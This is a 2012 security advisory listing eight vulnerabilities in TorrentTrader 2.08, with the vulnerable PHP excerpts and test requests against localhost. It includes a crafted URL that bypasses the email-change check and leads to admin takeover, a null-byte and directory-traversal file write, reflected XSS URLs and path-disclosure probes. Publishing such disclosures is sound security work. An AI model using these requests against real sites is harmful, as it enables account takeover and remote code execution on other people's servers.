[waraxe-2012-SA#089] - Multiple Vulnerabilities in TorrentTrader 2.08 =============================================================================== Author: Janek Vind "waraxe" Date: 17. September 2012 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-89.html Description of vulnerable software: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ TorrentTrader is a feature packed and highly customisable PHP/MySQL Based BitTorrent tracker. Featuring integrated forums, and plenty of administration options. http://sourceforge.net/projects/torrenttrader/ http://www.torrenttrader.org/topic/14292-torrenttrader-v208-released/ ############################################################################### 1. Unauthorized Email Change in "account-ce.php" ############################################################################### Reason: authorization bypass Attack vector: user submitted GET parameters "id", "secret" and "email" Preconditions: none Result: attacker can change any user's email, including admin's -----------------[ source code start ]--------------------------------- $id = (int) $_GET["id"]; $md5 = $_GET["secret"]; $email = $_GET["email"]; .. $res = SQL_Query_exec("SELECT `editsecret` FROM `users` WHERE `enabled` = 'yes' AND `status` = 'confirmed' AND `id` = '$id'"); $row = mysql_fetch_assoc($res); .. $sec = $row["editsecret"]; if ($md5 != md5($sec . $email . $sec)) show_error_msg(T_("ERROR"), T_("NOTHING_FOUND"), 1); SQL_Query_exec("UPDATE `users` SET `editsecret` = '', `email` = ".sqlesc($email)." WHERE `id` = '$id' AND `editsecret` = " . sqlesc($row["editsecret"])); -----------------[ source code end ]----------------------------------- Tests: Let's find md5 hash of email "test@test.com", which is "b642b4217b34b1e8d3bd915fc65c4452". Target user ID is 1. We issue GET request: http://localhost/torrenttrader208/account-ce.php?id=1& secret=b642b4217b34b1e8d3bd915fc65c4452&email=test@test.com Quick look to the database confirms, that email address of user with ID 1 has been changed indeed. Next logical move for attacker is password recovery request: http://localhost/torrenttrader208/account-recover.php After admin account takeover attacker is able to use next vulnerability, described below, which may allow php remote code execution. ############################################################################### 2. Arbitrary file creation / directory traversal in "nfo-edit.php" ############################################################################### Reason: failure to properly sanitize user submitted data Attack vector: user submitted POST parameters "id" and "content" Preconditions: 1. nfo-file editing privileges needed (usually admin) 2. PHP must be < 5.3.4 for null-byte attacks to work Result: 1. attacker is able to write remote files with arbitrary content 2. directory traversal vulnerability allows bypassing path restrictions -----------------[ source code start ]--------------------------------- $id = (int)$_GET["id"]?$_GET["id"]:$_POST["id"]; $do = $_POST["do"]; $nfo = $site_config["nfo_dir"] . "/$id.nfo"; if ($do == "update") { if (file_put_contents($nfo, $_POST["content"])) { write_log("NFO ($id) was updated by $CURUSER[username]."); -----------------[ source code end ]----------------------------------- Test: first we need html form like the one below: Log in as admin and then make POST request by cliking "Test" button. We should see "NFO Updated" as response and can confirm new file existence: http://localhost/torrenttrader208/uploads/test.php.nfo By using null byte ("\0") it's possible writing files with arbitrary extension. Finally, it is possible to make use of directory traversal strings "../" and write files to arbitrary location in remote server. ############################################################################### 3. Username Enumeration Vulnerability in "account-login.php" ############################################################################### Reason: different error messages for invalid username and invalid password Attack vector: user submitted POST parameters "username" and "password" Preconditions: none Result: attacker can enumerate valid usernames -----------------[ source code start ]--------------------------------- if (!empty($_POST["username"]) && !empty($_POST["password"])) { $res = SQL_Query_exec("SELECT id, password, secret, status, enabled FROM users WHERE username = " . sqlesc($_POST["username"]) . ""); $row = mysql_fetch_array($res); if (!$row) $message = T_("USERNAME_INCORRECT"); elseif ($row["status"] == "pending") $message = T_("ACCOUNT_PENDING"); elseif ($row["password"] != $password) $message = T_("PASSWORD_INCORRECT"); -----------------[ source code end ]----------------------------------- Tests: Try to log in with nonexistent username: "Username Incorrect" Next, try valid username with incorrect password: "Password Incorrect" So it's obvious, that attacker is able to distinguish between valid and invalid usernames and therefore username enumeration vulnerability exists. ############################################################################### 4. Reflected XSS in "faq.php" ############################################################################### Preconditions: "register_globals=on" Attack Vector: User provided parameter "faq_categ" http://localhost/torrenttrader208/faq.php?faq_categ[0][title]= &faq_categ[0][flag]=1 &faq_categ[0][items][0][question]=aa&faq_categ[0][items][0][answer]=bb &faq_categ[0][items][0][flag]=1 http://localhost/torrenttrader208/faq.php?faq_categ[0][title]=test&faq_categ[0][flag]=1 &faq_categ[0][items][0][question]= &faq_categ[0][items][0][answer]=bb&faq_categ[0][items][0][flag]=1 http://localhost/torrenttrader208/faq.php?faq_categ[0][title]=test&faq_categ[0][flag]=1 &faq_categ[0][items][0][question]=test&faq_categ[0][items][0][answer]= &faq_categ[0][items][0][flag]=1 ############################################################################### 5. Reflected XSS in "account-signup.php" ############################################################################### Preconditions: "register_globals=on" Attack Vector: User provided parameters "invite" and "secret" http://localhost/torrenttrader208/account-signup.php?invite_row=1 &invite="> http://localhost/torrenttrader208/account-signup.php?invite_row=1 &secret="> ############################################################################### 6. Reflected XSS in "/themes/default/header.php" ############################################################################### Preconditions: "register_globals=on" Attack Vector: User provided parameters "title" and "site_config" http://localhost/torrenttrader208/themes/default/header.php? title= http://localhost/torrenttrader208/themes/default/header.php? site_config[CHARSET]="> http://localhost/torrenttrader208/themes/default/header.php? site_config[SITEURL]=--> ############################################################################### 7. Reflected XSS in "/themes/NB-Clean/header.php" ############################################################################### Preconditions: "register_globals=on" Attack Vector: User provided parameters "title" and "site_config" http://localhost/torrenttrader208/themes/NB-Clean/header.php? title= http://localhost/torrenttrader208/themes/NB-Clean/header.php? site_config[CHARSET]="> http://localhost/torrenttrader208/themes/NB-Clean/header.php? site_config[SITEURL]="> ############################################################################### 8. Path Disclosure vulnerability in multiple scripts ############################################################################### http://localhost/torrenttrader208/account-login.php?returnto[] Warning: htmlspecialchars() expects parameter 1 to be string, array given in C:/apache_www/torrenttrader208/account-login.php on line 72 http://localhost/torrenttrader208/themes/default/footer.php Fatal error: Call to undefined function T_() in C:/apache_www/torrenttrader208/themes/default/footer.php on line 26 http://localhost/torrenttrader208/themes/default/header.php Fatal error: Call to undefined function T_() in C:/apache_www/torrenttrader208/themes/default/header.php on line 28 http://localhost/torrenttrader208/themes/NB-Clean/footer.php Fatal error: Call to undefined function T_() in C:/apache_www/torrenttrader208/themes/NB-Clean/footer.php on line 22 http://localhost/torrenttrader208/faq.php?faq_categ=1 Fatal error: Cannot use string offset as an array in C:/apache_www/torrenttrader208/faq.php on line 17 http://localhost/torrenttrader208/rss.php?cat[] Warning: explode() expects parameter 2 to be string, array given in C:\apache_www\torrenttrader208\rss.php on line 119 http://localhost/torrenttrader208/backend/smilies.php?action=display&form[] Warning: htmlspecialchars() expects parameter 1 to be string, array given in C:\apache_www\torrenttrader208\backend\smilies.php on line 50 Contact: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ come2waraxe@yahoo.com Janek Vind "waraxe" Waraxe forum: http://www.waraxe.us/forums.html Personal homepage: http://www.janekvind.com/ Random project: http://albumnow.com/ ---------------------------------- [ EOF ] ------------------------------------